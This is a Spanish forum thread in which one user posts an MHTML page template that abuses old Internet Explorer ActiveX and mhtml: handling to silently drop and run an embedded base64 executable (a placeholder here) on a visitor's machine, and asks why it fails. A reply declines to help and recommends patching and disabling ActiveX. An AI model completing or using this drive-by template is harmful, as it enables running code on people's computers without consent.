Descargar y Ejecutar Programa en el Cliente.

Buenas Noches:

Estoy intentando probar la inseguridad del Iexplorer en el modulo que estoy haciendo, para ello he leido un documento en el que se puede enviar un programa al cliente (mediante lo de base64) sin que este se entere y ejecutarlo.

Para ello he hecho la siguiente pagina denominada: PruebaSeguridad.mhtml

El contenido de dicha pagina es el siguiente:
MIME-Version: 1.0
Content-Location:file:///server.exe
Content-Transfer-Encoding: base64
CODIGO RARO DEL .EXE

<script>
function lanzar(){
s=document.URL;
path=s.substr(-0,s.lastIndexOf("\\"));
document.write(path);
document.write('<Br><Br><Br>');
path=unescape(path);
document.write('<object classid="clsid:66666666-6666-6666-6666" CODEBASE="mhtml:'+path+'\\server.html!file:///server.exe"></object>');
}
setTimeout("lanzar()",150);
</script>

Pues bien, no me funciona dicha aplicación, pero se qeu se puede hacer, lo estoy intentando en mi Win98SE que por lo que se funciona en esta version de windows.

¿Alguien me puede decir por que no me genera el .exe en la carpeta de Archivos Temporales de Internet y por qeu no lo ejecuta?

Muchas Gracias por Adelantado.

Hola,

Base64 es una forma de codificación hacia texto ASCI pero no entiendo alguna razón de por qué quisieras que se ejecute un programa en el cliente sin su consentimiento.

Si habia leido que desde el 2001 se detecto una vulnerabilidad en IE 5.01 y 5.5 porque el encabezado del MIME en correos podía ejecutar algunos programas, pero Microsoft sacó un parche para ello. Luego se vio una vulnerabilidad similar incluyendo lo del malware en base al Base64 y un poco antes el MHT "overflow" tanto en IE 5 y 6 que podía luego dejar corriendo un código malicioso, pero según intenté, del que hablas sí sé que IE 5.5 es vulnerable si no está "parchado" y con un ActiveX se puede ejecutar un programa sin consentimiento del usuario, aun cuando éste diga NO a todo aviso de su ejecución.

Este año salió otra vulnerabilidad no me acuerdo que mes fue... pero muy parecido al del MIME / Base64 que ejecuta un programa utilizando un Activex sin consentimiento del usuario y de solo abrir una página de internet. Pero en serio no entiendo la razón para que quieras ejecutar un programa en el cliente... Otros usuarios podrían utilizar la información que se pudiese dar aquí para insertar troyanos o virus en las PCs de otros. Lamento no poder ayudarte con este tema...

Hasta ahora el único consejo que han dado es actualizar la seguridad de tu navegador e ir a las propiedades de seguridad del IE deshabilitar la ejecucion de ActiveX y scripts hasta estar seguros de donde navegaremos...